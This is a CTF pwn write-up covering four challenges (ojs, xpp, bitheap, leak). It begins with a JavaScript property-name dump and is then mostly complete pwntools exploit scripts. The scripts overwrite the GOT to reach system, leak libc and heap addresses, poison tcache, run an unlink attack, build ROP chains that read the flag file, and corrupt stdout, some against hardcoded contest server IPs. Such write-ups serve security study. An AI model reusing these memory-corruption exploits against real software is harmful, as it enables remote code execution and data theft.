prop:length
prop:setSeconds
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setTime
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setUTCDate
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setUTCFullYear
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setUTCHours
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setUTCMilliseconds
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setUTCMinutes
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setUTCMonth
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setUTCSeconds
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setYear
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toDateString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toGMTString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toISOString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toJSON
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toLocaleDateString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toLocaleString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toLocaleTimeString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toTimeString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toUTCString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:valueOf
prop:Date
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:constructor
prop:global
prop:ignoreCase
prop:lastIndex
prop:multiline
prop:length
prop:source
prop:sticky
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:exec
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:test
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toString
prop:RegExp
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:constructor
prop:length
prop:name
prop:length
prop:message
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:EvalError
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:RangeError
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:ReferenceError
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:SyntaxError
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:TypeError
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:URIError
prop:Error
prop:E
prop:LN2
prop:LN10
prop:LOG2E
prop:LOG10E
prop:PI
prop:M_PI_2
prop:M_PI_4
prop:M_1_PI
prop:M_2_PI
prop:M_2_SQRTPI
prop:SQRT1_2
prop:SQRT2
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:abs
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:acos
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:asin
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:atan
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:atan2
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:ceil
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:cos
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:exp
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:floor
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:log
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:max
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:min
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:pow
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:random
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:round
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:sin
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:sqrt
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:tan
prop:Math
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:log
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:error
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:info
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:assert
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:time
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:timeEnd
prop:console
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:run
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:info
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:spy
prop:gc
prop:NaN
prop:Infinity
prop:undefined
prop:this
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:Float32Array
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:Float64Array
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:Uint8Array
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:Uint16Array
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:Uint32Array
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:Int8Array
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:Int16Array
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:Int32Array
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:isNaN
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:isFinite
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:parseInt
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:parseFloat
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:eval
prop:length
prop:FH_VERSION
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:load
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:print
'''
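# Print every line of `a` that does not occur anywhere in `b`, in `a`'s order.
# `a` and `b` are the two property dumps captured above; both are rebound to
# their line lists here (later code may rely on that), exactly as before.
a = a.splitlines()
b = b.splitlines()
known = set(b)  # one hash lookup per line instead of rescanning all of `b` for each line of `a`
for line in a:
    if line not in known:
        print(line)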
找到新增函数 charTo,charAt有越界读,并且发现 charTo 被修改,存在越界写,需要保证string长度为3
# Driver for the "ojs" challenge: replay poc.js into the interpreter one line
# at a time, then hand the connection over to the operator.
from pwn import *
context.log_level = "debug"
#sh = process(['./ojs'], stdin=PTY)
sh = remote('47.95.3.91', 24377)   # contest-instance address; the local-process variant is the commented line above
#gdb.attach(sh, "b *0x0000000000410C2F")
with open("poc.js", "r") as f:
    # each poc.js line is only sent after the interpreter has printed its ">" prompt
    for i in f.readlines():
        sh.sendlineafter(">", i)
sh.sendline("cat flag")
sh.interactive()
字符串的 replace 内部会调用 strstr,开局调用一次让 got 表有 libc,然后改 libc 为 system,再触发一次就 RCE 了
// poc.js for the ojs challenge, following the note above: the string must be
// exactly three characters, charTo/charAt are the out-of-bounds primitives,
// and String.prototype.replace is the call that reaches strstr.
a = "ABC";
x = a.charTo(0, 0x11);              // return value is used as the base for the offset below
sh = "/bin/sh"
sh.replace('x', 'y')                // first replace: per the note, this resolves the strstr import
strstr = 0x629290;                  // fixed address for this binary (the strstr slot named in the note); not derived at runtime
offset = strstr - x;
o1 = a.charAt(offset) & 0xff;       // read the three low bytes at the computed offset
o2 = a.charAt(offset + 1) & 0xff;
o3 = a.charAt(offset + 2) & 0xff;
a.charTo(offset, o1 - 0x50)         // byte deltas are presumably specific to the challenge's libc build
a.charTo(offset + 1, o2 + 0x4a)
a.charTo(offset + 2, o3 - 0x7)
sh.replace('x', 'y')                // second replace: the same call path, now through the rewritten slot
xpp
node 结构体
00000000 node struc ; (sizeof=0x20, mappedto_21)
00000000 left dq ? ; offset
00000008 right dq ? ; offset
00000010 value dq ? ; offset
00000018 id dq ?
00000020 node ends
string 结构体
00000000 string struc ; (sizeof=0x30, mappedto_20)
00000000 cache db 24 dup(?)
00000018 ptr dq ? ; offset
00000020 len dq ?
00000028 key dq ?
00000030 string ends
EXP
from pwn import *
sh = process('./xpp_bak')  # local copy of the challenge binary; every helper below talks to this tube
def choice(idx):
    """Select menu entry ``idx`` once the menu's "5. Exit" line has been printed."""
    menu_marker = "5. Exit"
    sh.sendlineafter(menu_marker, str(idx))
def add(content):
    """Menu option 1: create a note whose body is ``content`` (sent as-is, no str())."""
    choice(1)
    content_prompt = "Content:"
    sh.sendlineafter(content_prompt, content)
def show(key):
    """Menu option 2: print the note stored under ``key``."""
    choice(2)
    key_prompt = "Key: "
    sh.sendlineafter(key_prompt, str(key))
def delete(key):
    """Menu option 3: free the note stored under ``key``."""
    choice(3)
    key_prompt = "Key:"
    sh.sendlineafter(key_prompt, str(key))
def edit(key, content):
    """Menu option 4: replace the note stored under ``key`` with ``content``."""
    choice(4)
    for prompt, value in (("Key:", key), ("New note:", content)):
        sh.sendlineafter(prompt, str(value))
def deprotect(prot):
    """Undo the ``ptr ^ (ptr >> 12)`` mangling of a 48-bit value.

    The top 12 bits are never mangled, so they are recovered first; each
    lower 12-bit group is then unmasked with the group just above it.
    Returns the recovered value as an int.
    """
    recovered = 0
    group_above = 0
    for shift in (36, 24, 12, 0):
        group = (prot & (0xfff << shift)) ^ (group_above >> 12)
        recovered |= group
        group_above = group
    return recovered
# --- interaction sequence ---------------------------------------------------
# Notes appear to be addressed by their first 8 bytes read as a little-endian
# integer (hence show(str(0x3030303030303030)) for a note starting with "0"*8).
# Every offset below is tied to the challenge's libc/heap layout and is not
# derived at runtime.
context.log_level = "debug"
# add('0' * 0x800)
add("6" * 0x800)
add("0" * 8)
show(str(0x3030303030303030))
libc_base = u64(sh.recvuntil('\\x7f')[-6:].ljust(8, '\\x00')) - 0x21a330
log.success("libc_base:\\t" + hex(libc_base))
add("0" * 0x20)
add("2" * 0x8)
add("5" * 0x20)
add("4" * 0x20)
add("0" * 0x20)
delete(str(0x3535353535353535))
delete(str(0x3636363636363636))
add("0" * 0x20)
add("1" * 0x20)
add("3" * 8)
delete(str(0x3131313131313131))
show(str(0x3232323232323232))
heap_leak = u64(sh.recvuntil('\\n', drop=True)[-6:].ljust(8, '\\x00'))
log.success("heap_leak:\\t" + hex(heap_leak))
# the leaked value is presumably a mangled (safe-linked) pointer, so it is unmangled before use
heap_base = deprotect(heap_leak) - 0x12840
log.success("heap_base:\\t" + hex(heap_base))
std_Init = libc_base + 0x3e58f0   # computed but not used below
environ = libc_base + 0x221200    # computed but not used below
cpp_fflush = libc_base + 0x554260
system_addr = libc_base + 0x50d60
cerr = libc_base + 0x556420
edit(str(0x3232323232323232), p64((cerr - 0x10) ^ ((heap_base + 0x127d0) >> 12)))
add("9" * 8)
add('a' * 0x10 + '/bin/sh\\x00')
delete(str(0x3939393939393939))
edit(str(0x3333333333333333), p64((cpp_fflush) ^ ((heap_base + 0x127d0) >> 12)))
add('k' * 8)
add(p64(system_addr))
sh.interactive()
bitheap
Edit 功能存在一位的溢出，可以覆盖下一个堆块的 prev_inuse 位，相当于一个能够泄露堆地址的 off-by-null
from pwn import *
context.log_level = "debug"
context.arch = "amd64"          # needed by flat()/p64() used further down
sh = remote('101.201.71.136', 33358)   # contest-instance address; the local-process variant is the commented line below
#sh = process(['./bitheap'])
def choice(idx):
    """Select menu entry ``idx`` after the "choice: " prompt."""
    menu_prompt = "choice: "
    sh.sendlineafter(menu_prompt, str(idx))
def add(idx, size):
    """Menu option 1: allocate a chunk of ``size`` bytes in slot ``idx``."""
    choice(1)
    for prompt, value in (("Index: ", idx), ("Size: ", size)):
        sh.sendlineafter(prompt, str(value))
def edit(idx, content, tag=False):
    """Menu option 2: rewrite the chunk in slot ``idx``.

    ``content`` is sent as ASCII '0'/'1' characters, one per bit, with the
    least-significant bit of each byte first (presumably the format the
    service reads). With ``tag`` set, one extra '0' bit is appended.
    """
    choice(2)
    sh.sendlineafter("Index: ", str(idx))
    bits = "".join(bin(u8(ch))[2:].rjust(8, '0')[::-1] for ch in content)
    if tag:
        bits += '0'
    sh.sendafter("Content: ", bits)
def show(idx):
    """Menu option 3: print the chunk in slot ``idx``."""
    choice(3)
    index_prompt = "Index: "
    sh.sendlineafter(index_prompt, str(idx))
def delete(idx):
    """Menu option 4: free the chunk in slot ``idx``."""
    choice(4)
    index_prompt = "Index: "
    sh.sendlineafter(index_prompt, str(idx))
# --- interaction sequence ---------------------------------------------------
# Uses the one-bit overflow described in the note above (edit(..., tag=True)
# is what appends the extra bit). All libc offsets and gadget addresses below
# are tied to the challenge's libc build and are not resolved at runtime.
add(0, 0x88)
add(1, 0x88)
for i in range(2, 2 + 7):
    add(i, 0x88)
delete(0)
delete(1)
add(1, 0x88)
add(0, 0x88)
show(1)
heap_base = u64(sh.recvuntil('\\n', drop=True)[-6:].ljust(8, '\\x00')) - 0x260
log.success("heap_base:\\t" + hex(heap_base))
fake_chunk = heap_base + 0x2e0
fake_ptr = fake_chunk + 0x20
fd = fake_ptr - 0x18
bk = fake_ptr - 0x10
chunk_data = p64(fd) + p64(bk) + p64(fake_chunk)
chunk_data = chunk_data.ljust(0x80, '\\x00') + p64(0x90)
edit(1, chunk_data, True)   # tag=True: the extra bit is the overflow from the note
for i in range(2, 2 + 7):
    delete(i)
delete(0)
for i in range(2, 2 + 7):
    add(i, 0x88)
add(0, 0x88)
show(1)
libc_base = u64(sh.recvuntil('\\n', drop=True)[-6:].ljust(8, '\\x00')) - 0x3ebca0
log.success("libc_base:\\t" + hex(libc_base))
pop_rdi_addr = libc_base + 0x2164f
pop_rsi_addr = libc_base + 0x23a6a
pop_rdx_addr = libc_base + 0x1b96
pop_rax_addr = libc_base + 0x1b500
syscall_addr = libc_base + 0xd2625
free_hook_addr = libc_base + 0x3ed8e8   # computed but not used below
environ = libc_base + 0x3ee098
gets_addr = libc_base + 0x80060         # computed but not used below
add(9, 0x88)
delete(0)
delete(9)
edit(1, p64(environ))
add(9, 0x88)
add(0, 0x88)
show(0)
stack = u64(sh.recvuntil('\\n', drop=True)[-6:].ljust(8, '\\x00')) - 0x120
log.success("stack:\\t" + hex(stack))
delete(2)
delete(9)
edit(1, p64(stack - 0x18))
add(9, 0x88)
add(2, 0x88)
start_addr = stack - 0x18
# stage 1: a single raw syscall with rdi=0, rsi=stack, rdx=0x200 (register
# values as listed; the syscall number is whatever rax holds at that point)
rop_chain1 = flat([
    pop_rdi_addr,
    0,
    pop_rsi_addr,
    stack,
    pop_rdx_addr,
    0x200,
    syscall_addr,
])
# stage 2: the three syscalls annotated inline; the 'flag' string lives at
# start_addr (see `content` below)
rop_chain2 = flat([
    pop_rdi_addr,
    start_addr,
    pop_rsi_addr,
    0,
    pop_rax_addr, # sys_open('flag', 0)
    2,
    syscall_addr,
    pop_rax_addr, # sys_read(flag_fd, heap, 0x100)
    0,
    pop_rdi_addr,
    3,
    pop_rsi_addr,
    start_addr + 0x200,
    pop_rdx_addr,
    0x100,
    syscall_addr,
    pop_rax_addr, # sys_write(1, heap, 0x100)
    1,
    pop_rdi_addr,
    1,
    pop_rsi_addr,
    start_addr + 0x200,
    syscall_addr
])
#gdb.attach(sh, "b *$rebase(0x0000000000000EA7)")
content = 'flag'.ljust(0x18, '\\x00') + rop_chain1
# same bit encoding as edit(), but the menu choice is sent without waiting
# for the "choice: " prompt
sh.sendline(str(2))
sh.sendlineafter("Index: ", str(2))
send_content = ""
for i in content:
    send_content += bin(u8(i))[2:].rjust(8, '0')[::-1]
sh.sendafter("Content: ", send_content)
# stage 2 is delivered as raw bytes, presumably consumed by the stage-1 syscall
sh.sendline(p64(pop_rdi_addr + 1) * 0x10 + rop_chain2)
sh.interactive()
leak
解题思路见 VNCTF 2022 HideOnHeap 这题
# encoding: utf-8
from pwn import *
# Module-level state shared by the helpers below. `sh` itself is created in
# __main__ and rebound by Attack() when it has to reconnect.
elf = None
libc = None
file_name = "./leak"
context.timeout = 1  # default tube timeout (seconds) for every recv in this script
def get_file(dic=""):
    """Point ``context.binary`` at ``dic + file_name`` and return the resulting ELF."""
    binary_path = dic + file_name
    context.binary = binary_path
    return context.binary
def get_libc(dic=""):
    """Return the libc the target binary links against, or None if none is found.

    Sets ``context.binary`` first if it is still unset. When several library
    paths match, the last one listed wins (no early exit).
    """
    if context.binary is None:
        context.binary = dic + file_name
    assert isinstance(context.binary, ELF)
    found = None
    for lib_path in context.binary.libs:
        looks_like_libc = '/libc.' in lib_path or '/libc-' in lib_path
        if looks_like_libc:
            found = ELF(lib_path, checksec=False)
    return found
def get_sh(Use_other_libc=False, Use_ssh=False):
    """Open a tube to the target: a local process, or a remote/ssh one when REMOTE is set.

    Remote mode reads host/port (or "host:port") from sys.argv; ssh mode reads
    host, user, port and password from argv[3], argv[1], argv[2], argv[4].
    ``Use_other_libc`` swaps the module-level ``libc`` for ./libc.so.6 (remote only).
    """
    global libc
    if not args['REMOTE']:
        return process([file_name])
    if Use_other_libc:
        libc = ELF("./libc.so.6", checksec=False)
    if Use_ssh:
        session = ssh(sys.argv[3], sys.argv[1], int(sys.argv[2]), sys.argv[4])
        return session.process([file_name])
    host_arg = sys.argv[1]
    if ":" in host_arg:
        parts = host_arg.split(':')
        return remote(parts[0], int(parts[1]))
    return remote(host_arg, int(sys.argv[2]))
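def get_address(sh, libc=False, info=None, start_string=None, address_len=None, end_string=None, offset=None,
                int_mode=False):
    """Read one address from the tube ``sh``, optionally log it, and return it as an int.

    Exactly one decoding strategy is used, chosen in this order:
      * ``libc``        - read up to the 0x7f marker and unpack the 6 bytes ending
                          there (a typical little-endian 64-bit userland pointer);
                          ``info`` defaults to the "libc_base" label.
      * ``int_mode``    - the bytes up to ``end_string`` are a hex string.
      * ``address_len`` - take that many raw bytes from whatever is pending.
      * otherwise       - raw bytes up to ``end_string``: 8 on amd64, 4 elsewhere.

    ``start_string``, when given, is consumed first; ``offset`` is added to the
    decoded value; ``info`` (when not None) prefixes the log line.
    NOTE(review): the marker/terminator literals in this file are written with a
    doubled backslash, which would make recvuntil look for the literal text
    rather than the byte - presumably a rendering artifact; confirm against the
    original script.
    """
    if start_string is not None:
        sh.recvuntil(start_string)
    if libc:
        if info is None:
            info = 'libc_base:\\t'
        return_address = u64(sh.recvuntil('\\x7f')[-6:].ljust(8, '\\x00'))
    elif int_mode:
        return_address = int(sh.recvuntil(end_string, drop=True), 16)
    elif address_len is not None:
        return_address = u64(sh.recv()[:address_len].ljust(8, '\\x00'))
    elif context.arch == 'amd64':
        return_address = u64(sh.recvuntil(end_string, drop=True).ljust(8, '\\x00'))
    else:
        return_address = u32(sh.recvuntil(end_string, drop=True).ljust(4, '\\x00'))
    if offset is not None:
        return_address += offset
    if info is not None:
        log.success(info + hex(return_address))
    return return_address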
def get_flag(sh):
    """Drain pending output, run ``cat flag`` on the tube and return what comes back.

    Returns "" if the connection is already closed (EOFError at any step).
    """
    output = None
    try:
        sh.recvrepeat(0.1)
        sh.sendline('cat flag')
        output = sh.recvrepeat(0.3)
    except EOFError:
        output = ""
    return output
def get_gdb(sh, addr=None, gdbscript=None, stop=False):
    """Attach gdb to ``sh`` for local runs; does nothing when REMOTE is set.

    ``gdbscript`` takes precedence over ``addr``; ``addr`` is a PIE-relative
    offset turned into a ``b *$rebase(...)`` breakpoint. ``stop`` pauses after
    attaching.
    """
    if args['REMOTE']:
        return
    if gdbscript is not None:
        script = gdbscript
    elif addr is not None:
        script = 'b *$rebase(' + hex(addr) + ")"
    else:
        script = None
    if script is None:
        gdb.attach(sh)
    else:
        gdb.attach(sh, script)
    if stop:
        pause()
def Attack(target=None, elf=None, libc=None):
    """Run pwn() against the module-level tube ``sh``, reconnecting on EOF.

    Two calling conventions:
      * ``sh`` already set at module level (see __main__): ``elf``/``libc`` are passed in.
      * ``sh`` is None: a ``Class.Target`` instance supplies tube, elf and libc
        (``Class.Target`` is a project-local module not shown in this file).
    At most 30 attempts are made. Returns whatever get_flag() read after pwn()
    returned, or an error string when a Target reconnect reports ``connect_fail``.
    """
    global sh
    if sh is None:
        from Class.Target import Target
        assert target is not None
        assert isinstance(target, Target)
        sh = target.sh
        elf = target.elf
        libc = target.libc
    assert isinstance(elf, ELF)
    assert isinstance(libc, ELF)
    try_count = 0
    while try_count < 30:
        try_count += 1
        try:
            pwn(sh, elf, libc)
            break
        except KeyboardInterrupt:
            break
        except EOFError:
            # the connection dropped mid-attempt: reopen it and try again
            sh.close()
            if target is not None:
                sh = target.get_sh()
                target.sh = sh
                if target.connect_fail:
                    return 'ERROR : Can not connect to target server!'
            else:
                sh = get_sh()
    flag = get_flag(sh)
    return flag
def choice(idx):
    """Select menu entry ``idx`` after the "choice: " prompt."""
    menu_prompt = "choice: "
    sh.sendlineafter(menu_prompt, str(idx))
def add(idx, size):
    """Menu option 1: allocate a chunk of ``size`` bytes in slot ``idx``."""
    choice(1)
    for prompt, value in (("Index: ", idx), ("Size: ", size)):
        sh.sendlineafter(prompt, str(value))
def edit(idx, content):
    """Menu option 2: overwrite the chunk in slot ``idx`` with ``content`` (sent without a newline)."""
    choice(2)
    sh.sendlineafter("Index: ", str(idx))
    payload = str(content)
    sh.sendafter("Content: ", payload)
def delete(idx):
    """Menu option 3: free the chunk in slot ``idx``."""
    choice(3)
    index_prompt = "Index: "
    sh.sendlineafter(index_prompt, str(idx))
def pwn(sh, elf, libc):
    """Interaction sequence for the leak challenge (see the note above for the approach).

    ``elf`` and ``libc`` are accepted for the Attack() contract but not read here;
    every size and byte value below is tied to the challenge's heap/libc layout.
    """
    context.log_level = "debug"
    delta = 0xb30
    size = (delta * 2) + 0x20
    alloc_size = size - 0x10
    add(0, alloc_size)
    add(1, alloc_size + 0x10)
    add(2, alloc_size + 0x20)
    add(3, 0x80)
    add(4, 0x80)
    add(5, 0x80)
    for i in range(8):
        edit(4, p64(0) * 2)
        delete(4)
    delete(3)
    edit(4, '\\x40\\xf9')
    add(6, 0x80)
    add(7, 0x80) # global_max_fast
    add(8, 0x110) # clear unsortedbin
    for i in range(3):
        edit(4, p64(0) * 2)
        delete(4)
    edit(4, '\\x60\\xe7')
    add(9, 0x80)
    add(10, 0x80) # stdout
    edit(7, '\\xff' * 8)
    delete(0)
    delete(1)
    delete(2)
    edit(10, p64(0xfbad1800) + '\\x00' * 0x19)
    choice(6)  # menu option 6 has no wrapper above; what it does is not shown in this file
    # gdb.attach(sh, "b free")
    # delete(0)
    sh.interactive()
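if __name__ == "__main__":
    sh = get_sh()
    flag = Attack(elf=get_file(), libc=get_libc())
    sh.close()
    if flag != "":
        # Attack() may return an error string, and the captured output may simply
        # not contain a flag; don't dereference a failed search (None.group()).
        match = re.search(r'flag{.+}', flag)
        if match:
            log.success('The flag is ' + match.group())
        else:
            log.failure('No flag found in output: ' + repr(flag))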